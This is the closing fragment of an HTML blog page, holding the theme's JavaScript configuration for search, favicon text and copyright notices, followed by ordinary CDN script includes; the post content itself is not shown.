    path: '2022/10/11/house-of-emma/',
    favicon: {
      show: "（●´3｀●）Goooood",
      hide: "(´Д｀)Booooom"
    },
    search : {
      placeholder: "Search for Posts",
      empty: "We didn't find any results for the search: ${query}",
      stats: "${hits} results found in ${time} ms"
    },
    valine: true,fancybox: true,
    copyright: 'Copied to clipboard successfully! <br> All articles in this blog are licensed under <i class="ic i-creative-commons"></i>BY-NC-SA.',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.5"></script>




</body>
</html>
